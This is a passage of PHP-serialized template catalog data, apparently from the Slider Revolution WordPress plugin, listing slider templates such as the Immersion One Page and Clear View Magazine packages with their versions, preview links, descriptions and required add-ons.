AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"},{\"path\":\"revslider-duotonefilters-addon\\/revslider-duotonefilters-addon.php\",\"name\":\"Duotone AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:182;a:22:{s:2:\"id\";s:3:\"185\";s:5:\"title\";s:13:\"Reveal Add-on\";s:5:\"alias\";s:13:\"reveal-add-on\";s:3:\"zip\";s:17:\"reveal-add-on.zip\";s:3:\"uid\";s:32:\"7fa7525d8ff7fa7365cb98a437e88e32\";s:3:\"img\";s:24:\"reveal-add-on/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/wordpress-content-reveal-effect/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:204:\"<span class=\"ttm_content\">An example template that uses our Reveal Add-On, which adds 14 new preloaders combined with reveal loading effects for any slider or hero.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:337:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"},{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:201;a:22:{s:2:\"id\";s:3:\"210\";s:5:\"title\";s:21:\"Cryptocurrency Prices\";s:5:\"alias\";s:12:\"cryptoslider\";s:3:\"zip\";s:16:\"cryptoslider.zip\";s:3:\"uid\";s:32:\"c4b02210387f11946223977e940d9e9e\";s:3:\"img\";s:23:\"cryptoslider/slide1.jpg\";s:7:\"preview\";s:95:\"https://revolution.themepunch.com/cryptocurrency-wordpress-price-api-bitcoin-ethereum-litecoin/\";s:7:\"version\";s:5:\"1.0.5\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:209:\"<span class=\"ttm_content\">This Template can show live, animated cryptocurrency prices. More than 1300 currencies are supported, getting prices via the cryptocompare API.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:410:\"<span class=\"ttm_content\">Please refer to the \"Custom JavaScript\" section of this sliders settings, for info on how to modify currencies. Provide a class to the row / column / group where the currency text elements are located in.</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:202;a:25:{s:2:\"id\";s:3:\"211\";s:5:\"title\";s:18:\"Immersion One Page\";s:5:\"alias\";s:26:\"immersion-one-page-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:26:\"immersion-one-page-package\";s:3:\"img\";s:31:\"packages/immersion_overview.jpg\";s:7:\"preview\";s:74:\"https://revolution.themepunch.com/immersion-wordpress-one-page-theme-2018/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.6\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:292:\"<span class=\"ttm_content\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:3:{i:0;s:6:\"slider\";i:1;s:4:\"hero\";i:2;s:7:\"website\";}s:14:\"plugin_require\";s:343:\"[{\"path\":\"revslider-typewriter-addon\\/revslider-typewriter-addon.php\",\"name\":\"Typewriter AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/typewriter-addon\\/\"},{\"path\":\"revslider-slicey-addon\\/revslider-slicey-addon.php\",\"name\":\"Background Slicey Add-On\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Immersion One Page\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"10\";s:9:\"installed\";b:0;}i:203;a:25:{s:2:\"id\";s:3:\"212\";s:5:\"title\";s:16:\"Immersion Header\";s:5:\"alias\";s:16:\"immersion_header\";s:3:\"zip\";s:26:\"packs/immersion_header.zip\";s:3:\"uid\";s:32:\"853da51256308b341ecd030bd4883229\";s:3:\"img\";s:27:\"immersion_header/slide1.jpg\";s:7:\"preview\";s:74:\"https://revolution.themepunch.com/immersion-wordpress-one-page-theme-2018/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:292:\"<span class=\"ttm_content\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:173:\"[{\"path\":\"revslider-typewriter-addon\\/revslider-typewriter-addon.php\",\"name\":\"Typewriter AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/typewriter-addon\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Immersion One Page\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"10\";s:9:\"installed\";b:0;}i:204;a:25:{s:2:\"id\";s:3:\"213\";s:5:\"title\";s:19:\"Immersion Mountains\";s:5:\"alias\";s:19:\"immersion-mountains\";s:3:\"zip\";s:29:\"packs/immersion-mountains.zip\";s:3:\"uid\";s:32:\"817167eb3fe22b7e065ba210cbe6d53c\";s:3:\"img\";s:30:\"immersion-mountains/slide1.jpg\";s:7:\"preview\";s:74:\"https://revolution.themepunch.com/immersion-wordpress-one-page-theme-2018/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:292:\"<span class=\"ttm_content\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:171:\"[{\"path\":\"revslider-slicey-addon\\/revslider-slicey-addon.php\",\"name\":\"Background Slicey Add-On\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Immersion One Page\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"10\";s:9:\"installed\";b:0;}i:205;a:25:{s:2:\"id\";s:3:\"214\";s:5:\"title\";s:17:\"Immersion Product\";s:5:\"alias\";s:17:\"immersion-product\";s:3:\"zip\";s:27:\"packs/immersion-product.zip\";s:3:\"uid\";s:32:\"64134f263484d2bbcd7ef088ffbbfb4b\";s:3:\"img\";s:28:\"immersion-product/slide1.jpg\";s:7:\"preview\";s:74:\"https://revolution.themepunch.com/immersion-wordpress-one-page-theme-2018/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:292:\"<span class=\"ttm_content\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Immersion One Page\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"10\";s:9:\"installed\";b:0;}i:206;a:25:{s:2:\"id\";s:3:\"215\";s:5:\"title\";s:16:\"Immersion Design\";s:5:\"alias\";s:16:\"immersion-design\";s:3:\"zip\";s:26:\"packs/immersion-design.zip\";s:3:\"uid\";s:32:\"91e1d77c1a2826438763804f4d02bc26\";s:3:\"img\";s:27:\"immersion-design/slide1.jpg\";s:7:\"preview\";s:74:\"https://revolution.themepunch.com/immersion-wordpress-one-page-theme-2018/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:292:\"<span class=\"ttm_content\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Immersion One Page\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"10\";s:9:\"installed\";b:0;}i:207;a:25:{s:2:\"id\";s:3:\"216\";s:5:\"title\";s:22:\"Immersion Phototgraphy\";s:5:\"alias\";s:21:\"immersion-photography\";s:3:\"zip\";s:31:\"packs/immersion-photography.zip\";s:3:\"uid\";s:32:\"e3ddf0c577b09740f5cbf2e38ffd684d\";s:3:\"img\";s:32:\"immersion-photography/slide1.jpg\";s:7:\"preview\";s:74:\"https://revolution.themepunch.com/immersion-wordpress-one-page-theme-2018/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:292:\"<span class=\"ttm_content\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Immersion One Page\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"10\";s:9:\"installed\";b:0;}i:208;a:25:{s:2:\"id\";s:3:\"217\";s:5:\"title\";s:14:\"Immersion Grid\";s:5:\"alias\";s:14:\"immersion-grid\";s:3:\"zip\";s:24:\"packs/immersion-grid.zip\";s:3:\"uid\";s:32:\"b6903868189bb83b2c7a852fde3a7dc3\";s:3:\"img\";s:25:\"immersion-grid/slide1.jpg\";s:7:\"preview\";s:74:\"https://revolution.themepunch.com/immersion-wordpress-one-page-theme-2018/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.4.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:292:\"<span class=\"ttm_content\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Immersion One Page\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"10\";s:9:\"installed\";b:0;}i:209;a:22:{s:2:\"id\";s:3:\"218\";s:5:\"title\";s:18:\"Funky Intro Slider\";s:5:\"alias\";s:11:\"funkyslider\";s:3:\"zip\";s:15:\"funkyslider.zip\";s:3:\"uid\";s:32:\"2d4187e3fdad19b976be335253c8925d\";s:3:\"img\";s:22:\"funkyslider/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/funky-intro-slider-wordpress-plugin/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:200:\"<span class=\"ttm_content\">This funky intro slider fits just right if you need a striking introduction to your website! Sleek, beautiful and easily customizable!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:335:\"[{\"path\":\"revslider-typewriter-addon\\/revslider-typewriter-addon.php\",\"name\":\"Typewriter AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/typewriter-addon\\/\"},{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:210;a:25:{s:2:\"id\";s:3:\"219\";s:5:\"title\";s:19:\"Clear View Magazine\";s:5:\"alias\";s:27:\"clear-view-magazine-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:27:\"clear-view-magazine-package\";s:3:\"img\";s:41:\"packages/clear_view_magazine_overview.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-minimal-magazine-wordpress-template/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";s:163:\"[{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:19:\"Clear View Magazine\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"11\";s:9:\"installed\";b:0;}i:211;a:25:{s:2:\"id\";s:3:\"220\";s:5:\"title\";s:15:\"Clear View Menu\";s:5:\"alias\";s:14:\"clearview_menu\";s:3:\"zip\";s:24:\"packs/clearview_menu.zip\";s:3:\"uid\";s:32:\"eaecee5fa5f3c3a7f4d2a96c4616a353\";s:3:\"img\";s:25:\"clearview_menu/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-minimal-magazine-wordpress-template/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:19:\"Clear View Magazine\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"11\";s:9:\"installed\";b:0;}i:212;a:25:{s:2:\"id\";s:3:\"221\";s:5:\"title\";s:17:\"Clear View Header\";s:5:\"alias\";s:16:\"clearview_header\";s:3:\"zip\";s:26:\"packs/clearview_header.zip\";s:3:\"uid\";s:32:\"25e3dd80ad130875d7438a07952cb0cd\";s:3:\"img\";s:27:\"clearview_header/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-minimal-magazine-wordpress-template/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:163:\"[{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:19:\"Clear View Magazine\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"11\";s:9:\"installed\";b:0;}i:213;a:25:{s:2:\"id\";s:3:\"222\";s:5:\"title\";s:18:\"Clear View Mission\";s:5:\"alias\";s:17:\"clearview_mission\";s:3:\"zip\";s:27:\"packs/clearview_mission.zip\";s:3:\"uid\";s:32:\"35b2092a49fd2beb549342e69097eb5b\";s:3:\"img\";s:28:\"clearview_mission/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-minimal-magazine-wordpress-template/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:19:\"Clear View Magazine\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"11\";s:9:\"installed\";b:0;}i:214;a:25:{s:2:\"id\";s:3:\"223\";s:5:\"title\";s:17:\"Clear View Slider\";s:5:\"alias\";s:17:\"clear-view-slider\";s:3:\"zip\";s:27:\"packs/clear-view-slider.zip\";s:3:\"uid\";s:32:\"d2e17edffce16ed78c54b0ef23fd7e05\";s:3:\"img\";s:28:\"clear-view-slider/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-minimal-magazine-wordpress-template/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:19:\"Clear View Magazine\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"11\";s:9:\"installed\";b:0;}i:215;a:25:{s:2:\"id\";s:3:\"224\";s:5:\"title\";s:15:\"Clear View News\";s:5:\"alias\";s:15:\"clear-view-news\";s:3:\"zip\";s:25:\"packs/clear-view-news.zip\";s:3:\"uid\";s:32:\"5698d3131ba141e9afcfd2906739dd00\";s:3:\"img\";s:26:\"clear-view-news/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-minimal-magazine-wordpress-template/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:19:\"Clear View 